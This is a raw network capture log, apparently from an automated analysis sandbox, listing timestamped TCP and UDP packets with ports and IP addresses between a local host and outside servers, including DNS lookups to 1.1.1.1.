                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.025974989 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026175022 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026228905 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026473045 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026485920 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026494026 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:13.026537895 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.365900993 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.365988016 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.366488934 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.366496086 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.367980003 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.367986917 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368041039 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368053913 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368062973 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368067980 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368119955 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368134022 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368143082 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368151903 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368180037 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368185043 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368207932 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368251085 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368258953 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368283033 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368346930 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368356943 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:14.368772984 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973589897 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973655939 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973674059 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973716021 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973787069 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973824024 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973848104 CET49863443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:15.973865986 CET4434986394.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.049652100 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.049706936 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.049779892 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.050004005 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.050017118 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995187998 CET49790443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995239019 CET44349790162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995234966 CET49791443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995260000 CET49794443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995285988 CET44349794162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995290041 CET44349791162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995299101 CET49795443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995318890 CET44349795162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995408058 CET49793443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995414019 CET44349793162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995434999 CET49792443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:16.995440960 CET44349792162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.452414036 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.452512980 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.453073978 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.453078985 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.454835892 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.454839945 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.839514971 CET44349804104.126.116.26192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.839694023 CET44349804104.126.116.26192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:17.839782000 CET49804443192.168.2.7104.126.116.26
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338696003 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338761091 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338769913 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338812113 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338813066 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.338850975 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.339021921 CET49865443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.339030981 CET4434986594.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.340254068 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.340300083 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.340368986 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.340550900 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.340568066 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.573781013 CET4434981123.219.82.72192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.574004889 CET4434981123.219.82.72192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.574162006 CET49811443192.168.2.723.219.82.72
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.660643101 CET49811443192.168.2.723.219.82.72
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.660660982 CET4434981123.219.82.72192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.660703897 CET49804443192.168.2.7104.126.116.26
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:18.660744905 CET44349804104.126.116.26192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.855624914 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.855709076 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.856092930 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.856100082 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.858045101 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:19.858052969 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809322119 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809415102 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809448957 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809470892 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809743881 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809757948 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.673891068 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.674061060 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.674118996 CET49826443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.010679960 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.010870934 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.011049986 CET49829443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692734003 CET49826443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692770004 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692785978 CET49829443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692821026 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.719989061 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.720402002 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.720460892 CET49845443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728830099 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728898048 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728955984 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:48.243072987 CET49796443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:48.243094921 CET44349796162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783447981 CET49847443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783456087 CET49846443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783462048 CET44349847204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783505917 CET44349846204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883184910 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883208036 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883301973 CET49845443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883327961 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214749098 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214786053 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214884043 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.215089083 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.215102911 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425133944 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425540924 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425556898 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426589012 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426687956 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426964998 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.427062035 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.470627069 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.470654964 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.517360926 CET49876443192.168.2.723.219.82.40

                                                                                                                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:12:59.274734020 CET5290853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:12:59.519468069 CET53529081.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:01.454765081 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:02.039859056 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:16.087943077 CET5720653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:16.229360104 CET53572061.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.190912008 CET4953253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:18.592995882 CET53495321.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.805119038 CET53595711.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.885952950 CET53584431.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.970803022 CET5917853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:33.970963955 CET5959853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:34.109833002 CET53591781.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:34.110208035 CET53595981.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:36.667715073 CET53567111.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:37.893281937 CET53628071.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.854537964 CET6543653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.854794025 CET5005353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:48.996591091 CET53500531.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.567929029 CET5022953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:51.568382978 CET5549353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.360037088 CET5572553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.360225916 CET6092653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.499181032 CET53557251.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:52.500315905 CET53609261.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.074254990 CET5515153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.074631929 CET5448253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.075220108 CET6286853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.075397968 CET5873553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.097162962 CET6257753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.097378969 CET5529653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.215002060 CET53551511.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.215663910 CET53544821.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.216192007 CET53587351.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.216553926 CET53628681.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.236780882 CET53552961.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:53.238658905 CET53625771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:55.263613939 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:55.575665951 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:55.588056087 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.175946951 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.349138021 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.349179983 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.350594044 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.350745916 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.350816011 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.351181984 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.352732897 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.354820013 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.377264023 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.415250063 CET63673443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.490134954 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.648832083 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649122000 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649895906 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649933100 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650484085 CET5167353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650703907 CET5055653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652445078 CET6090353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652661085 CET6059953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.653032064 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.751863956 CET63673443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765032053 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765125990 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765140057 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765145063 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765149117 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765158892 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765171051 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765182018 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765235901 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773155928 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773349047 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773425102 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773475885 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET53516731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.792205095 CET53505561.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.804016113 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817250967 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817346096 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817425966 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817437887 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.910213947 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.917823076 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.932440042 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.949525118 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.955205917 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963615894 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963643074 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963675976 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963686943 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963972092 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.967225075 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.997303963 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.087059975 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.175898075 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.253153086 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.256891966 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.257066011 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.257188082 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.257380009 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.257662058 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.258045912 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.258167982 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.263756990 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.264585972 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.269445896 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.269948959 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.272948980 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.273109913 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.273367882 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.273653984 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.300436020 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.300883055 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.301748991 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.301985979 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.355690002 CET63673443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.537605047 CET44363673162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.537636042 CET44363673162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.537650108 CET44363673162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.537822008 CET44363673162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:57.538373947 CET63673443192.168.2.7162.159.61.3
